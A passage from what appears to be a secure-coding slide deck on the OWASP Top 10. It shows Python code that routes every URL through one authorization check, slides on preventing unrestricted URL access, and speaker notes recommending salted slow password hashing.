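    return required in ROLES.get(user, set())


def _add_account_form(user, **_):
    return "<form method=post action=add_acct.php>...</form>"


def _add_acct(user, new_account=None, **_):
    ACCOUNTS.add(new_account)
    return f"created {new_account}"


def _profile(user, **_):
    return f"profile of {user}"


HANDLERS = {
    "add_account_form.php": _add_account_form,
    "add_acct.php": _add_acct,
    "profile.php": _profile,
}


def dispatch(user, url, **params):
    """Single choke point: every handler, not just the ones that render links,
    goes through the same authorization check before it runs."""
    if not authorize(user, url):
        return 403, "forbidden"
    return 200, HANDLERS[url](user, **params)


def access_matrix(users, urls):
    """Decision for every (user, url) pair, including users with no role and
    URLs outside the policy; review it for anything unexpectedly True."""
    return {(u, url): authorize(u, url) for u in users for url in urls}
```

The matrix is the regression test the next slides ask for: generate it from the documented roles, commit the expected decisions, and fail the build when a new URL appears without a policy entry.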
45. A10. Failure to Restrict URL Access: Protection
Start Early!
Create an application specific security policy during the requirements phase.
Document user roles as well as what functions and content each role is authorized to access.
Specifying access requirements up front allows simplification of the design.
If your access control is not simple, it won't be secure.
46. A10. Failure to Restrict URL Access: Protection (2)
Test Thoroughly!
Conduct extensive regression testing to ensure the access control scheme cannot be bypassed.
Test all invalid access attempts as well as valid access.
Don't follow the normal application flow: request URLs directly, out of order, and with the wrong role.
Verify that all aspects of user management have been taken into consideration, including scalability and maintainability.
47. Summary
Application security starts with the architecture and design
Security can't be added on later without redesigning and rewriting
Custom code often introduces vulnerabilities
Application vulnerabilities are NOT prevented by traditional security controls such as network firewalls
Don't invent your own security controls
Design, design, design, code, test, test, test
Editor's Notes
Even valid authentication schemes can be undermined by flawed account management functions including:
account update
forgotten passwords
change password, and other similar functions
Active session management requires a strong session id that cannot be captured, hijacked, or guessed.
Passwords should never be stored in plain text within the application.
It's surprising how many times developers will try to put a password in code or a configuration file in clear text.
Passwords should always be stored in either hashed (preferred) or possibly an encrypted form.
A salted, deliberately slow password hash (bcrypt, which is derived from the Blowfish cipher, scrypt, Argon2 or PBKDF2) is preferred, as it is not reversible; a fast general-purpose hash such as MD5 is not suitable for passwords.
The problem with using symmetric encryption to store a password is that it requires another key for the encryption. Now how do you hide the password to the password…